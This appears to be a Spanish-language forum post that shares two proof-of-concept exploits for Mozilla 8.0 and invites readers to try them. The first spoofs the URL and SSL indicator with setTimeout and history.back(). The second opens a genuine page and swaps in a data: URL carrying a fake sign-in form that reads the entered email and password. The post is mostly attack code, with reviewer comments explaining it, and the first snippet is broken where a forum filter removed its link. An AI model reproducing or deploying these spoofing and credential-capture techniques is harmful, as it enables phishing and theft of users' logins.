Prueben y comenten:
mozilla 8.0 (URL & SSL Spoofing):
// Spoofing PoC #1 as posted: sets the current document's location to the
// external link and, 100 ms later, calls history.back(). Both calls use the
// string-eval form of setTimeout; passing a function is the equivalent, safer
// idiom.
// NOTE(review): the argument on the first setTimeout line is unterminated as
// posted — the forum's link filter removed the URL together with the closing
// quote and the delay argument — so this function does not parse verbatim.
function gotogo(){
setTimeout("document.location.href='[Enlace externo eliminado para invitados]);
setTimeout("history.back();",100);
}
</script>
<a href="[Enlace externo eliminado para invitados]" onclick="gotogo();">clickme and forward me</a>
mozilla 8.0-2 (Advanced URL & SSL Spoofing/Remote code execution):
<body>
<script>
// targetUrl is the genuine page whose address bar / SSL state the PoC tries to
// keep on screen; the forum filter replaced the real URL with a placeholder.
var targetUrl = "[Enlace externo eliminado para invitados]";
// dataUrl1: a data: document holding one link whose javascript: href calls
// b() on the opener, passing the popup's own window object (see function b).
// The <><![CDATA[ ... ]]></> form is an E4X XML literal (old SpiderMonkey
// only); .toString() yields the literal text, which is then percent-encoded.
var dataUrl1 = "data:text/html," + encodeURIComponent(<><![CDATA[
<a href="javascript:opener.b(window)">Click me (open google)</a>
]]></>.toString());
// dataUrl2: the fake sign-in page. Its inline c() handler reads the two fields
// and, in this PoC, only shows them with alert(); the embedded text itself
// says where a real attack would send them. The markup travels inside an E4X
// CDATA literal, so the inner </script> is split across two CDATA sections to
// avoid closing the outer <script>. Nothing inside the literal is JavaScript
// at this level — it is the string content of the data: URL, reproduced as is.
var dataUrl2 = "data:text/html," + encodeURIComponent(<><![CDATA[
<body onload="document.getElementById('Email').focus()">
<script>
function c() {
var e = document.getElementById("Email");
var p = document.getElementById("Passwd");
if (!e.value && !p.value) return;
var s = "Email: " + e.value + "\nPassword: " + p.value;
s += "\n\nAn attacker can send this information to the attacker's server.";
alert(s);
}
<]]><![CDATA[/script>
<pre>
<strong>Sign in</strong>
<form onsubmit="c(); return false" action="javascript:">
<label>Email
<input type="text" id="Email">
</label>
<label>Password
<input type="password" id="Passwd">
</label>
<input type="submit" value="Sign in">
</form>
</pre>
</body>
]]></>.toString());
// dataUrl3: the outer data: document — a borderless, full-viewport iframe that
// loads dataUrl2 (interpolated through the E4X {dataUrl2} expression). This is
// the document that b() swaps into the window opened on targetUrl.
var dataUrl3 = "data:text/html," + encodeURIComponent(<>
<style><![CDATA[
* {
padding: 0px;
margin: 0px;
}
iframe {
border: none;
width: 100%;
height: 100%;
}
]]></style>
<iframe src={dataUrl2}></iframe>
</>.toString());
// Step 1 of the PoC: opens the popup containing dataUrl1. The popup's link
// reaches back into this page through `opener` (see dataUrl1), which is the
// channel the rest of the demonstration depends on.
function a() {
open(dataUrl1);
}
// Called from the popup (w) when its link is clicked. The spoof is driven by
// event ordering: on the popup's blur, alert(1) fires, a new window w2 is
// opened on the genuine targetUrl, and w2's onunload schedules a replacement of
// its location with dataUrl3 followed by close(). The defect being shown is
// that the address bar / SSL indicator of the genuine page could survive that
// replacement in the affected Mozilla build. The fix lives on the browser side:
// modern browsers refuse top-level navigations to data: URLs, and opening links
// with noopener severs the `opener` relationship this PoC relies on.
function b(w) {
w.onblur = function() {
// Disarm the handler so the sequence runs only once.
w.onblur = null;
w.alert(1);
var w2 = open(targetUrl);
w2.onunload = function() {
// Deferred with a 0 ms timeout so it runs after the unload has begun.
setTimeout(function() {
w2.location = dataUrl3;
w2.close();
}, 0);
};
};
w.close();
}
</script>
<pre>
Steps to reproduce:
1. <a href="javascript:a()">Click me</a> to open a new tab.
2. In the new tab, click a link.
3. A fake page is loaded.
</pre>
</body>
Siempre por aqui